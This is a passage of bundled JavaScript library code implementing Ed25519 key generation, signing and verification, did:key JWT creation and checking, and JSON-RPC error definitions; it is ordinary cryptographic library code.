    t14 = v - c * 65536;
    v = t15 + c + 65535;
    c = Math.floor(v / 65536);
    t15 = v - c * 65536;
    t0 += c - 1 + 37 * (c - 1);
    // second car
    c = 1;
    v = t0 + c + 65535;
    c = Math.floor(v / 65536);
    t0 = v - c * 65536;
    v = t1 + c + 65535;
    c = Math.floor(v / 65536);
    t1 = v - c * 65536;
    v = t2 + c + 65535;
    c = Math.floor(v / 65536);
    t2 = v - c * 65536;
    v = t3 + c + 65535;
    c = Math.floor(v / 65536);
    t3 = v - c * 65536;
    v = t4 + c + 65535;
    c = Math.floor(v / 65536);
    t4 = v - c * 65536;
    v = t5 + c + 65535;
    c = Math.floor(v / 65536);
    t5 = v - c * 65536;
    v = t6 + c + 65535;
    c = Math.floor(v / 65536);
    t6 = v - c * 65536;
    v = t7 + c + 65535;
    c = Math.floor(v / 65536);
    t7 = v - c * 65536;
    v = t8 + c + 65535;
    c = Math.floor(v / 65536);
    t8 = v - c * 65536;
    v = t9 + c + 65535;
    c = Math.floor(v / 65536);
    t9 = v - c * 65536;
    v = t10 + c + 65535;
    c = Math.floor(v / 65536);
    t10 = v - c * 65536;
    v = t11 + c + 65535;
    c = Math.floor(v / 65536);
    t11 = v - c * 65536;
    v = t12 + c + 65535;
    c = Math.floor(v / 65536);
    t12 = v - c * 65536;
    v = t13 + c + 65535;
    c = Math.floor(v / 65536);
    t13 = v - c * 65536;
    v = t14 + c + 65535;
    c = Math.floor(v / 65536);
    t14 = v - c * 65536;
    v = t15 + c + 65535;
    c = Math.floor(v / 65536);
    t15 = v - c * 65536;
    t0 += c - 1 + 37 * (c - 1);
    o[0] = t0;
    o[1] = t1;
    o[2] = t2;
    o[3] = t3;
    o[4] = t4;
    o[5] = t5;
    o[6] = t6;
    o[7] = t7;
    o[8] = t8;
    o[9] = t9;
    o[10] = t10;
    o[11] = t11;
    o[12] = t12;
    o[13] = t13;
    o[14] = t14;
    o[15] = t15;
}
function $a1d7ebd43ba0a83c$var$square(o, a) {
    $a1d7ebd43ba0a83c$var$mul(o, a, a);
}
function $a1d7ebd43ba0a83c$var$inv25519(o, i) {
    const c = $a1d7ebd43ba0a83c$var$gf();
    let a;
    for(a = 0; a < 16; a++)c[a] = i[a];
    for(a = 253; a >= 0; a--){
        $a1d7ebd43ba0a83c$var$square(c, c);
        if (a !== 2 && a !== 4) $a1d7ebd43ba0a83c$var$mul(c, c, i);
    }
    for(a = 0; a < 16; a++)o[a] = c[a];
}
function $a1d7ebd43ba0a83c$var$pow2523(o, i) {
    const c = $a1d7ebd43ba0a83c$var$gf();
    let a;
    for(a = 0; a < 16; a++)c[a] = i[a];
    for(a = 250; a >= 0; a--){
        $a1d7ebd43ba0a83c$var$square(c, c);
        if (a !== 1) $a1d7ebd43ba0a83c$var$mul(c, c, i);
    }
    for(a = 0; a < 16; a++)o[a] = c[a];
}
function $a1d7ebd43ba0a83c$var$edadd(p, q) {
    const a = $a1d7ebd43ba0a83c$var$gf(), b = $a1d7ebd43ba0a83c$var$gf(), c = $a1d7ebd43ba0a83c$var$gf(), d = $a1d7ebd43ba0a83c$var$gf(), e = $a1d7ebd43ba0a83c$var$gf(), f = $a1d7ebd43ba0a83c$var$gf(), g = $a1d7ebd43ba0a83c$var$gf(), h = $a1d7ebd43ba0a83c$var$gf(), t = $a1d7ebd43ba0a83c$var$gf();
    $a1d7ebd43ba0a83c$var$sub(a, p[1], p[0]);
    $a1d7ebd43ba0a83c$var$sub(t, q[1], q[0]);
    $a1d7ebd43ba0a83c$var$mul(a, a, t);
    $a1d7ebd43ba0a83c$var$add(b, p[0], p[1]);
    $a1d7ebd43ba0a83c$var$add(t, q[0], q[1]);
    $a1d7ebd43ba0a83c$var$mul(b, b, t);
    $a1d7ebd43ba0a83c$var$mul(c, p[3], q[3]);
    $a1d7ebd43ba0a83c$var$mul(c, c, $a1d7ebd43ba0a83c$var$D2);
    $a1d7ebd43ba0a83c$var$mul(d, p[2], q[2]);
    $a1d7ebd43ba0a83c$var$add(d, d, d);
    $a1d7ebd43ba0a83c$var$sub(e, b, a);
    $a1d7ebd43ba0a83c$var$sub(f, d, c);
    $a1d7ebd43ba0a83c$var$add(g, d, c);
    $a1d7ebd43ba0a83c$var$add(h, b, a);
    $a1d7ebd43ba0a83c$var$mul(p[0], e, f);
    $a1d7ebd43ba0a83c$var$mul(p[1], h, g);
    $a1d7ebd43ba0a83c$var$mul(p[2], g, f);
    $a1d7ebd43ba0a83c$var$mul(p[3], e, h);
}
function $a1d7ebd43ba0a83c$var$cswap(p, q, b) {
    for(let i = 0; i < 4; i++)$a1d7ebd43ba0a83c$var$sel25519(p[i], q[i], b);
}
function $a1d7ebd43ba0a83c$var$pack(r, p) {
    const tx = $a1d7ebd43ba0a83c$var$gf(), ty = $a1d7ebd43ba0a83c$var$gf(), zi = $a1d7ebd43ba0a83c$var$gf();
    $a1d7ebd43ba0a83c$var$inv25519(zi, p[2]);
    $a1d7ebd43ba0a83c$var$mul(tx, p[0], zi);
    $a1d7ebd43ba0a83c$var$mul(ty, p[1], zi);
    $a1d7ebd43ba0a83c$var$pack25519(r, ty);
    r[31] ^= $a1d7ebd43ba0a83c$var$par25519(tx) << 7;
}
function $a1d7ebd43ba0a83c$var$scalarmult(p, q, s) {
    $a1d7ebd43ba0a83c$var$set25519(p[0], $a1d7ebd43ba0a83c$var$gf0);
    $a1d7ebd43ba0a83c$var$set25519(p[1], $a1d7ebd43ba0a83c$var$gf1);
    $a1d7ebd43ba0a83c$var$set25519(p[2], $a1d7ebd43ba0a83c$var$gf1);
    $a1d7ebd43ba0a83c$var$set25519(p[3], $a1d7ebd43ba0a83c$var$gf0);
    for(let i = 255; i >= 0; --i){
        const b = s[i / 8 | 0] >> (i & 7) & 1;
        $a1d7ebd43ba0a83c$var$cswap(p, q, b);
        $a1d7ebd43ba0a83c$var$edadd(q, p);
        $a1d7ebd43ba0a83c$var$edadd(p, p);
        $a1d7ebd43ba0a83c$var$cswap(p, q, b);
    }
}
function $a1d7ebd43ba0a83c$var$scalarbase(p, s) {
    const q = [
        $a1d7ebd43ba0a83c$var$gf(),
        $a1d7ebd43ba0a83c$var$gf(),
        $a1d7ebd43ba0a83c$var$gf(),
        $a1d7ebd43ba0a83c$var$gf()
    ];
    $a1d7ebd43ba0a83c$var$set25519(q[0], $a1d7ebd43ba0a83c$var$X);
    $a1d7ebd43ba0a83c$var$set25519(q[1], $a1d7ebd43ba0a83c$var$Y);
    $a1d7ebd43ba0a83c$var$set25519(q[2], $a1d7ebd43ba0a83c$var$gf1);
    $a1d7ebd43ba0a83c$var$mul(q[3], $a1d7ebd43ba0a83c$var$X, $a1d7ebd43ba0a83c$var$Y);
    $a1d7ebd43ba0a83c$var$scalarmult(p, q, s);
}
// Generates key pair from secret 32-byte seed.
function $a1d7ebd43ba0a83c$var$generateKeyPairFromSeed(seed) {
    if (seed.length !== $a1d7ebd43ba0a83c$exports.SEED_LENGTH) throw new Error(`ed25519: seed must be ${$a1d7ebd43ba0a83c$exports.SEED_LENGTH} bytes`);
    const d = (0, $2cc6b12a8ccb780d$exports.hash)(seed);
    d[0] &= 248;
    d[31] &= 127;
    d[31] |= 64;
    const publicKey = new Uint8Array(32);
    const p = [
        $a1d7ebd43ba0a83c$var$gf(),
        $a1d7ebd43ba0a83c$var$gf(),
        $a1d7ebd43ba0a83c$var$gf(),
        $a1d7ebd43ba0a83c$var$gf()
    ];
    $a1d7ebd43ba0a83c$var$scalarbase(p, d);
    $a1d7ebd43ba0a83c$var$pack(publicKey, p);
    const secretKey = new Uint8Array(64);
    secretKey.set(seed);
    secretKey.set(publicKey, 32);
    return {
        publicKey: publicKey,
        secretKey: secretKey
    };
}
$a1d7ebd43ba0a83c$exports.generateKeyPairFromSeed = $a1d7ebd43ba0a83c$var$generateKeyPairFromSeed;
function $a1d7ebd43ba0a83c$var$generateKeyPair(prng) {
    const seed = (0, $73945d82524e104e$exports.randomBytes)(32, prng);
    const result = $a1d7ebd43ba0a83c$var$generateKeyPairFromSeed(seed);
    (0, $276678191c4bdb56$exports.wipe)(seed);
    return result;
}
$a1d7ebd43ba0a83c$exports.generateKeyPair = $a1d7ebd43ba0a83c$var$generateKeyPair;
function $a1d7ebd43ba0a83c$var$extractPublicKeyFromSecretKey(secretKey) {
    if (secretKey.length !== $a1d7ebd43ba0a83c$exports.SECRET_KEY_LENGTH) throw new Error(`ed25519: secret key must be ${$a1d7ebd43ba0a83c$exports.SECRET_KEY_LENGTH} bytes`);
    return new Uint8Array(secretKey.subarray(32));
}
$a1d7ebd43ba0a83c$exports.extractPublicKeyFromSecretKey = $a1d7ebd43ba0a83c$var$extractPublicKeyFromSecretKey;
const $a1d7ebd43ba0a83c$var$L = new Float64Array([
    0xed,
    0xd3,
    0xf5,
    0x5c,
    0x1a,
    0x63,
    0x12,
    0x58,
    0xd6,
    0x9c,
    0xf7,
    0xa2,
    0xde,
    0xf9,
    0xde,
    0x14,
    0,
    0,
    0,
    0,
    0,
    0,
    0,
    0,
    0,
    0,
    0,
    0,
    0,
    0,
    0,
    0x10
]);
function $a1d7ebd43ba0a83c$var$modL(r, x) {
    let carry;
    let i;
    let j;
    let k;
    for(i = 63; i >= 32; --i){
        carry = 0;
        for(j = i - 32, k = i - 12; j < k; ++j){
            x[j] += carry - 16 * x[i] * $a1d7ebd43ba0a83c$var$L[j - (i - 32)];
            carry = Math.floor((x[j] + 128) / 256);
            x[j] -= carry * 256;
        }
        x[j] += carry;
        x[i] = 0;
    }
    carry = 0;
    for(j = 0; j < 32; j++){
        x[j] += carry - (x[31] >> 4) * $a1d7ebd43ba0a83c$var$L[j];
        carry = x[j] >> 8;
        x[j] &= 255;
    }
    for(j = 0; j < 32; j++)x[j] -= carry * $a1d7ebd43ba0a83c$var$L[j];
    for(i = 0; i < 32; i++){
        x[i + 1] += x[i] >> 8;
        r[i] = x[i] & 255;
    }
}
function $a1d7ebd43ba0a83c$var$reduce(r) {
    const x = new Float64Array(64);
    for(let i = 0; i < 64; i++)x[i] = r[i];
    for(let i = 0; i < 64; i++)r[i] = 0;
    $a1d7ebd43ba0a83c$var$modL(r, x);
}
// Returns 64-byte signature of the message under the 64-byte secret key.
function $a1d7ebd43ba0a83c$var$sign(secretKey, message) {
    const x = new Float64Array(64);
    const p = [
        $a1d7ebd43ba0a83c$var$gf(),
        $a1d7ebd43ba0a83c$var$gf(),
        $a1d7ebd43ba0a83c$var$gf(),
        $a1d7ebd43ba0a83c$var$gf()
    ];
    const d = (0, $2cc6b12a8ccb780d$exports.hash)(secretKey.subarray(0, 32));
    d[0] &= 248;
    d[31] &= 127;
    d[31] |= 64;
    const signature = new Uint8Array(64);
    signature.set(d.subarray(32), 32);
    const hs = new $2cc6b12a8ccb780d$exports.SHA512();
    hs.update(signature.subarray(32));
    hs.update(message);
    const r = hs.digest();
    hs.clean();
    $a1d7ebd43ba0a83c$var$reduce(r);
    $a1d7ebd43ba0a83c$var$scalarbase(p, r);
    $a1d7ebd43ba0a83c$var$pack(signature, p);
    hs.reset();
    hs.update(signature.subarray(0, 32));
    hs.update(secretKey.subarray(32));
    hs.update(message);
    const h = hs.digest();
    $a1d7ebd43ba0a83c$var$reduce(h);
    for(let i = 0; i < 32; i++)x[i] = r[i];
    for(let i = 0; i < 32; i++)for(let j = 0; j < 32; j++)x[i + j] += h[i] * d[j];
    $a1d7ebd43ba0a83c$var$modL(signature.subarray(32), x);
    return signature;
}
$a1d7ebd43ba0a83c$exports.sign = $a1d7ebd43ba0a83c$var$sign;
function $a1d7ebd43ba0a83c$var$unpackneg(r, p) {
    const t = $a1d7ebd43ba0a83c$var$gf(), chk = $a1d7ebd43ba0a83c$var$gf(), num = $a1d7ebd43ba0a83c$var$gf(), den = $a1d7ebd43ba0a83c$var$gf(), den2 = $a1d7ebd43ba0a83c$var$gf(), den4 = $a1d7ebd43ba0a83c$var$gf(), den6 = $a1d7ebd43ba0a83c$var$gf();
    $a1d7ebd43ba0a83c$var$set25519(r[2], $a1d7ebd43ba0a83c$var$gf1);
    $a1d7ebd43ba0a83c$var$unpack25519(r[1], p);
    $a1d7ebd43ba0a83c$var$square(num, r[1]);
    $a1d7ebd43ba0a83c$var$mul(den, num, $a1d7ebd43ba0a83c$var$D);
    $a1d7ebd43ba0a83c$var$sub(num, num, r[2]);
    $a1d7ebd43ba0a83c$var$add(den, r[2], den);
    $a1d7ebd43ba0a83c$var$square(den2, den);
    $a1d7ebd43ba0a83c$var$square(den4, den2);
    $a1d7ebd43ba0a83c$var$mul(den6, den4, den2);
    $a1d7ebd43ba0a83c$var$mul(t, den6, num);
    $a1d7ebd43ba0a83c$var$mul(t, t, den);
    $a1d7ebd43ba0a83c$var$pow2523(t, t);
    $a1d7ebd43ba0a83c$var$mul(t, t, num);
    $a1d7ebd43ba0a83c$var$mul(t, t, den);
    $a1d7ebd43ba0a83c$var$mul(t, t, den);
    $a1d7ebd43ba0a83c$var$mul(r[0], t, den);
    $a1d7ebd43ba0a83c$var$square(chk, r[0]);
    $a1d7ebd43ba0a83c$var$mul(chk, chk, den);
    if ($a1d7ebd43ba0a83c$var$neq25519(chk, num)) $a1d7ebd43ba0a83c$var$mul(r[0], r[0], $a1d7ebd43ba0a83c$var$I);
    $a1d7ebd43ba0a83c$var$square(chk, r[0]);
    $a1d7ebd43ba0a83c$var$mul(chk, chk, den);
    if ($a1d7ebd43ba0a83c$var$neq25519(chk, num)) return -1;
    if ($a1d7ebd43ba0a83c$var$par25519(r[0]) === p[31] >> 7) $a1d7ebd43ba0a83c$var$sub(r[0], $a1d7ebd43ba0a83c$var$gf0, r[0]);
    $a1d7ebd43ba0a83c$var$mul(r[3], r[0], r[1]);
    return 0;
}
function $a1d7ebd43ba0a83c$var$verify(publicKey, message, signature) {
    const t = new Uint8Array(32);
    const p = [
        $a1d7ebd43ba0a83c$var$gf(),
        $a1d7ebd43ba0a83c$var$gf(),
        $a1d7ebd43ba0a83c$var$gf(),
        $a1d7ebd43ba0a83c$var$gf()
    ];
    const q = [
        $a1d7ebd43ba0a83c$var$gf(),
        $a1d7ebd43ba0a83c$var$gf(),
        $a1d7ebd43ba0a83c$var$gf(),
        $a1d7ebd43ba0a83c$var$gf()
    ];
    if (signature.length !== $a1d7ebd43ba0a83c$exports.SIGNATURE_LENGTH) throw new Error(`ed25519: signature must be ${$a1d7ebd43ba0a83c$exports.SIGNATURE_LENGTH} bytes`);
    if ($a1d7ebd43ba0a83c$var$unpackneg(q, publicKey)) return false;
    const hs = new $2cc6b12a8ccb780d$exports.SHA512();
    hs.update(signature.subarray(0, 32));
    hs.update(publicKey);
    hs.update(message);
    const h = hs.digest();
    $a1d7ebd43ba0a83c$var$reduce(h);
    $a1d7ebd43ba0a83c$var$scalarmult(p, q, h);
    $a1d7ebd43ba0a83c$var$scalarbase(q, signature.subarray(32));
    $a1d7ebd43ba0a83c$var$edadd(p, q);
    $a1d7ebd43ba0a83c$var$pack(t, p);
    if ($a1d7ebd43ba0a83c$var$verify32(signature, t)) return false;
    return true;
}
$a1d7ebd43ba0a83c$exports.verify = $a1d7ebd43ba0a83c$var$verify;
/**
 * Convert Ed25519 public key to X25519 public key.
 *
 * Throws if given an invalid public key.
 */ function $a1d7ebd43ba0a83c$var$convertPublicKeyToX25519(publicKey) {
    let q = [
        $a1d7ebd43ba0a83c$var$gf(),
        $a1d7ebd43ba0a83c$var$gf(),
        $a1d7ebd43ba0a83c$var$gf(),
        $a1d7ebd43ba0a83c$var$gf()
    ];
    if ($a1d7ebd43ba0a83c$var$unpackneg(q, publicKey)) throw new Error("Ed25519: invalid public key");
    // Formula: montgomeryX = (edwardsY + 1)*inverse(1 - edwardsY) mod p
    let a = $a1d7ebd43ba0a83c$var$gf();
    let b = $a1d7ebd43ba0a83c$var$gf();
    let y = q[1];
    $a1d7ebd43ba0a83c$var$add(a, $a1d7ebd43ba0a83c$var$gf1, y);
    $a1d7ebd43ba0a83c$var$sub(b, $a1d7ebd43ba0a83c$var$gf1, y);
    $a1d7ebd43ba0a83c$var$inv25519(b, b);
    $a1d7ebd43ba0a83c$var$mul(a, a, b);
    let z = new Uint8Array(32);
    $a1d7ebd43ba0a83c$var$pack25519(z, a);
    return z;
}
$a1d7ebd43ba0a83c$exports.convertPublicKeyToX25519 = $a1d7ebd43ba0a83c$var$convertPublicKeyToX25519;
/**
 *  Convert Ed25519 secret (private) key to X25519 secret key.
 */ function $a1d7ebd43ba0a83c$var$convertSecretKeyToX25519(secretKey) {
    const d = (0, $2cc6b12a8ccb780d$exports.hash)(secretKey.subarray(0, 32));
    d[0] &= 248;
    d[31] &= 127;
    d[31] |= 64;
    const o = new Uint8Array(d.subarray(0, 32));
    (0, $276678191c4bdb56$exports.wipe)(d);
    return o;
}
$a1d7ebd43ba0a83c$exports.convertSecretKeyToX25519 = $a1d7ebd43ba0a83c$var$convertSecretKeyToX25519;




var $aG48A = parcelRequire("aG48A");
const $57cb2bb50a99d8e7$export$51745f7832485c34 = "EdDSA";
const $57cb2bb50a99d8e7$export$f51b45e220f2ba98 = "JWT";
const $57cb2bb50a99d8e7$export$a3e35a0f952eb3ef = ".";
const $57cb2bb50a99d8e7$export$d2e6fe38c55f8e23 = "base64url";
const $57cb2bb50a99d8e7$export$c09c2801e10a2b95 = "utf8";
const $57cb2bb50a99d8e7$export$1e9219c0b91a4257 = "utf8";
const $57cb2bb50a99d8e7$export$d4057275de9d060b = ":";
const $57cb2bb50a99d8e7$export$acf13c61a1a0ccf3 = "did";
const $57cb2bb50a99d8e7$export$b908fe81ccf30934 = "key";
const $57cb2bb50a99d8e7$export$7bd18b7a7a4d0471 = "base58btc";
const $57cb2bb50a99d8e7$export$6d6d3d2e39be8d68 = "z";
const $57cb2bb50a99d8e7$export$9902a33a5776d1fc = "K36";
const $57cb2bb50a99d8e7$export$ca477e91394a742a = 32;
const $57cb2bb50a99d8e7$export$f09ad228919f26fb = 32;







function $f6e90d472e8dfc29$export$2030d1af6cd0ef93(str) {
    return (0, $81c2e06d24b89184$export$84137bb44359aed5)((0, $bdf44057d833ab1f$exports.toString)((0, $a4ed053a1131469e$exports.fromString)(str, (0, $57cb2bb50a99d8e7$export$d2e6fe38c55f8e23)), (0, $57cb2bb50a99d8e7$export$c09c2801e10a2b95)));
}
function $f6e90d472e8dfc29$export$84046f8082657cdf(val) {
    return (0, $bdf44057d833ab1f$exports.toString)((0, $a4ed053a1131469e$exports.fromString)((0, $81c2e06d24b89184$export$abc3f407e87918a4)(val), (0, $57cb2bb50a99d8e7$export$c09c2801e10a2b95)), (0, $57cb2bb50a99d8e7$export$d2e6fe38c55f8e23));
}
function $f6e90d472e8dfc29$export$1b29ef9371459e10(publicKey) {
    const header = (0, $a4ed053a1131469e$exports.fromString)((0, $57cb2bb50a99d8e7$export$9902a33a5776d1fc), (0, $57cb2bb50a99d8e7$export$7bd18b7a7a4d0471));
    const multicodec = (0, $57cb2bb50a99d8e7$export$6d6d3d2e39be8d68) + (0, $bdf44057d833ab1f$exports.toString)((0, $475c4a512fd4a246$exports.concat)([
        header,
        publicKey
    ]), (0, $57cb2bb50a99d8e7$export$7bd18b7a7a4d0471));
    return [
        (0, $57cb2bb50a99d8e7$export$acf13c61a1a0ccf3),
        (0, $57cb2bb50a99d8e7$export$b908fe81ccf30934),
        multicodec
    ].join((0, $57cb2bb50a99d8e7$export$d4057275de9d060b));
}
function $f6e90d472e8dfc29$export$86ac046d72244356(issuer) {
    const [prefix, method, multicodec] = issuer.split((0, $57cb2bb50a99d8e7$export$d4057275de9d060b));
    if (prefix !== (0, $57cb2bb50a99d8e7$export$acf13c61a1a0ccf3) || method !== (0, $57cb2bb50a99d8e7$export$b908fe81ccf30934)) throw new Error(`Issuer must be a DID with method "key"`);
    const base = multicodec.slice(0, 1);
    if (base !== (0, $57cb2bb50a99d8e7$export$6d6d3d2e39be8d68)) throw new Error(`Issuer must be a key in mulicodec format`);
    const bytes = (0, $a4ed053a1131469e$exports.fromString)(multicodec.slice(1), (0, $57cb2bb50a99d8e7$export$7bd18b7a7a4d0471));
    const type = (0, $bdf44057d833ab1f$exports.toString)(bytes.slice(0, 2), (0, $57cb2bb50a99d8e7$export$7bd18b7a7a4d0471));
    if (type !== (0, $57cb2bb50a99d8e7$export$9902a33a5776d1fc)) throw new Error(`Issuer must be a public key with type "Ed25519"`);
    const publicKey = bytes.slice(2);
    if (publicKey.length !== (0, $57cb2bb50a99d8e7$export$ca477e91394a742a)) throw new Error(`Issuer must be a public key with length 32 bytes`);
    return publicKey;
}
function $f6e90d472e8dfc29$export$d9746ef301b2089b(bytes) {
    return (0, $bdf44057d833ab1f$exports.toString)(bytes, (0, $57cb2bb50a99d8e7$export$d2e6fe38c55f8e23));
}
function $f6e90d472e8dfc29$export$c37aeb372ac07c0e(encoded) {
    return (0, $a4ed053a1131469e$exports.fromString)(encoded, (0, $57cb2bb50a99d8e7$export$d2e6fe38c55f8e23));
}
function $f6e90d472e8dfc29$export$cfdd1f2478131e3d(params) {
    return (0, $a4ed053a1131469e$exports.fromString)([
        $f6e90d472e8dfc29$export$84046f8082657cdf(params.header),
        $f6e90d472e8dfc29$export$84046f8082657cdf(params.payload)
    ].join((0, $57cb2bb50a99d8e7$export$a3e35a0f952eb3ef)), (0, $57cb2bb50a99d8e7$export$1e9219c0b91a4257));
}
function $f6e90d472e8dfc29$export$13923bea59211b58(data) {
    const params = (0, $bdf44057d833ab1f$exports.toString)(data, (0, $57cb2bb50a99d8e7$export$1e9219c0b91a4257)).split((0, $57cb2bb50a99d8e7$export$a3e35a0f952eb3ef));
    const header = $f6e90d472e8dfc29$export$2030d1af6cd0ef93(params[0]);
    const payload = $f6e90d472e8dfc29$export$2030d1af6cd0ef93(params[1]);
    return {
        header: header,
        payload: payload
    };
}
function $f6e90d472e8dfc29$export$1b70f4551c751d68(params) {
    return [
        $f6e90d472e8dfc29$export$84046f8082657cdf(params.header),
        $f6e90d472e8dfc29$export$84046f8082657cdf(params.payload),
        $f6e90d472e8dfc29$export$d9746ef301b2089b(params.signature)
    ].join((0, $57cb2bb50a99d8e7$export$a3e35a0f952eb3ef));
}
function $f6e90d472e8dfc29$export$9a62e6c0a30e00bc(jwt) {
    const params = jwt.split((0, $57cb2bb50a99d8e7$export$a3e35a0f952eb3ef));
    const header = $f6e90d472e8dfc29$export$2030d1af6cd0ef93(params[0]);
    const payload = $f6e90d472e8dfc29$export$2030d1af6cd0ef93(params[1]);
    const signature = $f6e90d472e8dfc29$export$c37aeb372ac07c0e(params[2]);
    const data = (0, $a4ed053a1131469e$exports.fromString)(params.slice(0, 2).join((0, $57cb2bb50a99d8e7$export$a3e35a0f952eb3ef)), (0, $57cb2bb50a99d8e7$export$1e9219c0b91a4257));
    return {
        header: header,
        payload: payload,
        signature: signature,
        data: data
    };
}


function $2281914794d9e636$export$a949d36eab55b41f(seed = (0, $73945d82524e104e$exports.randomBytes)((0, $57cb2bb50a99d8e7$export$f09ad228919f26fb))) {
    return $a1d7ebd43ba0a83c$exports.generateKeyPairFromSeed(seed);
}
async function $2281914794d9e636$export$a8dda30659d36d45(sub, aud, ttl, keyPair, iat = (0, $aG48A.fromMiliseconds)(Date.now())) {
    const header = {
        alg: (0, $57cb2bb50a99d8e7$export$51745f7832485c34),
        typ: (0, $57cb2bb50a99d8e7$export$f51b45e220f2ba98)
    };
    const iss = (0, $f6e90d472e8dfc29$export$1b29ef9371459e10)(keyPair.publicKey);
    const exp = iat + ttl;
    const payload = {
        iss: iss,
        sub: sub,
        aud: aud,
        iat: iat,
        exp: exp
    };
    const data = (0, $f6e90d472e8dfc29$export$cfdd1f2478131e3d)({
        header: header,
        payload: payload
    });
    const signature = $a1d7ebd43ba0a83c$exports.sign(keyPair.secretKey, data);
    return (0, $f6e90d472e8dfc29$export$1b70f4551c751d68)({
        header: header,
        payload: payload,
        signature: signature
    });
}
async function $2281914794d9e636$export$7b6fc79aa8c5b79c(jwt) {
    const { header: header, payload: payload, data: data, signature: signature } = (0, $f6e90d472e8dfc29$export$9a62e6c0a30e00bc)(jwt);
    if (header.alg !== (0, $57cb2bb50a99d8e7$export$51745f7832485c34) || header.typ !== (0, $57cb2bb50a99d8e7$export$f51b45e220f2ba98)) throw new Error("JWT must use EdDSA algorithm");
    const publicKey = (0, $f6e90d472e8dfc29$export$86ac046d72244356)(payload.iss);
    return $a1d7ebd43ba0a83c$exports.verify(publicKey, data, signature);
}



var $212b43c5ef62f705$exports = {};



$parcel$exportWildcard($b9995ea5f865dc88$exports, $212b43c5ef62f705$exports);





var $aG48A = parcelRequire("aG48A");

var $7etJZ = parcelRequire("7etJZ");
var $201d0312d0bb8021$exports = {};
$parcel$export($201d0312d0bb8021$exports, "parseConnectionError", () => $ab82c37acb5ed82a$export$f555d7d8f922e407);
$parcel$export($201d0312d0bb8021$exports, "formatJsonRpcError", () => $21f900087ef2a598$exports.formatJsonRpcError);
$parcel$export($201d0312d0bb8021$exports, "formatJsonRpcRequest", () => $21f900087ef2a598$exports.formatJsonRpcRequest);
$parcel$export($201d0312d0bb8021$exports, "formatJsonRpcResult", () => $21f900087ef2a598$exports.formatJsonRpcResult);
$parcel$export($201d0312d0bb8021$exports, "getBigIntRpcId", () => $21f900087ef2a598$exports.getBigIntRpcId);
$parcel$export($201d0312d0bb8021$exports, "IJsonRpcProvider", () => $21f900087ef2a598$exports.IJsonRpcProvider);
$parcel$export($201d0312d0bb8021$exports, "isHttpUrl", () => $21f900087ef2a598$exports.isHttpUrl);
$parcel$export($201d0312d0bb8021$exports, "isJsonRpcError", () => $21f900087ef2a598$exports.isJsonRpcError);
$parcel$export($201d0312d0bb8021$exports, "isJsonRpcRequest", () => $21f900087ef2a598$exports.isJsonRpcRequest);
$parcel$export($201d0312d0bb8021$exports, "isJsonRpcResponse", () => $21f900087ef2a598$exports.isJsonRpcResponse);
$parcel$export($201d0312d0bb8021$exports, "isJsonRpcResult", () => $21f900087ef2a598$exports.isJsonRpcResult);
$parcel$export($201d0312d0bb8021$exports, "isLocalhostUrl", () => $21f900087ef2a598$exports.isLocalhostUrl);
$parcel$export($201d0312d0bb8021$exports, "isReactNative", () => $21f900087ef2a598$exports.isReactNative);
$parcel$export($201d0312d0bb8021$exports, "isWsUrl", () => $21f900087ef2a598$exports.isWsUrl);
$parcel$export($201d0312d0bb8021$exports, "parseConnectionError", () => $21f900087ef2a598$exports.parseConnectionError);
$parcel$export($201d0312d0bb8021$exports, "formatJsonRpcError", () => $3bb3ddc7bbc938cc$export$9f7302ae26c3f77);
$parcel$export($201d0312d0bb8021$exports, "formatJsonRpcRequest", () => $3bb3ddc7bbc938cc$export$11d081ebb32d4398);
$parcel$export($201d0312d0bb8021$exports, "formatJsonRpcResult", () => $3bb3ddc7bbc938cc$export$478fdea01c2a3198);
$parcel$export($201d0312d0bb8021$exports, "getBigIntRpcId", () => $3bb3ddc7bbc938cc$export$799a3db5df197877);
$parcel$export($201d0312d0bb8021$exports, "IJsonRpcProvider", () => $4b3041b8db0f8b25$export$46957420a688a16d);
$parcel$export($201d0312d0bb8021$exports, "isHttpUrl", () => $ceb127018999f416$export$206c3129b8bb1b4f);
$parcel$export($201d0312d0bb8021$exports, "isLocalhostUrl", () => $ceb127018999f416$export$8eb4a0a481601f29);
$parcel$export($201d0312d0bb8021$exports, "isWsUrl", () => $ceb127018999f416$export$4e4463e75eccf20c);
$parcel$export($201d0312d0bb8021$exports, "isJsonRpcError", () => $2e45abd1d679ec32$export$5662a1047b4d1d15);
$parcel$export($201d0312d0bb8021$exports, "isJsonRpcRequest", () => $2e45abd1d679ec32$export$f6e4034abe07d2a5);
$parcel$export($201d0312d0bb8021$exports, "isJsonRpcResponse", () => $2e45abd1d679ec32$export$308ba927de2bcbe8);
$parcel$export($201d0312d0bb8021$exports, "isJsonRpcResult", () => $2e45abd1d679ec32$export$cb3d3b20e3223d77);
const $fb0266a13f89cf1a$export$2ecaad7eb5cc1f25 = "PARSE_ERROR";
const $fb0266a13f89cf1a$export$c77b2f9ece3946ce = "INVALID_REQUEST";
const $fb0266a13f89cf1a$export$e8d537b30db778d6 = "METHOD_NOT_FOUND";
const $fb0266a13f89cf1a$export$13aae195c7978fb1 = "INVALID_PARAMS";
const $fb0266a13f89cf1a$export$f6e3abf3038d348f = "INTERNAL_ERROR";
const $fb0266a13f89cf1a$export$125ebd30471ac25c = "SERVER_ERROR";
const $fb0266a13f89cf1a$export$af84821b5448ca78 = [
    -32700,
    -32600,
    -32601,
    -32602,
    -32603
];
const $fb0266a13f89cf1a$export$fff5b44b15c75f69 = [
    -32000,
    -32099
];
const $fb0266a13f89cf1a$export$cca5387ab287e1ae = {
    [$fb0266a13f89cf1a$export$2ecaad7eb5cc1f25]: {
        code: -32700,
        message: "Parse error"
    },
    [$fb0266a13f89cf1a$export$c77b2f9ece3946ce]: {
        code: -32600,
        message: "Invalid Request"
    },
    [$fb0266a13f89cf1a$export$e8d537b30db778d6]: {
        code: -32601,
        message: "Method not found"
    },
    [$fb0266a13f89cf1a$export$13aae195c7978fb1]: {
        code: -32602,
        message: "Invalid params"
    },
    [$fb0266a13f89cf1a$export$f6e3abf3038d348f]: {
        code: -32603,
        message: "Internal error"
    },
    [$fb0266a13f89cf1a$export$125ebd30471ac25c]: {
        code: -32000,
        message: "Server error"
    }
};
const $fb0266a13f89cf1a$export$d166979eca925bce = $fb0266a13f89cf1a$export$125ebd30471ac25c;



function $ab82c37acb5ed82a$export$e463129eb4bc487f(code) {
    return code <= (0, $fb0266a13f89cf1a$export$fff5b44b15c75f69)[0] && code >= (0, $fb0266a13f89cf1a$export$fff5b44b15c75f69)[1];
}
function $ab82c37acb5ed82a$export$2ae0ec6393ab16c3(code) {
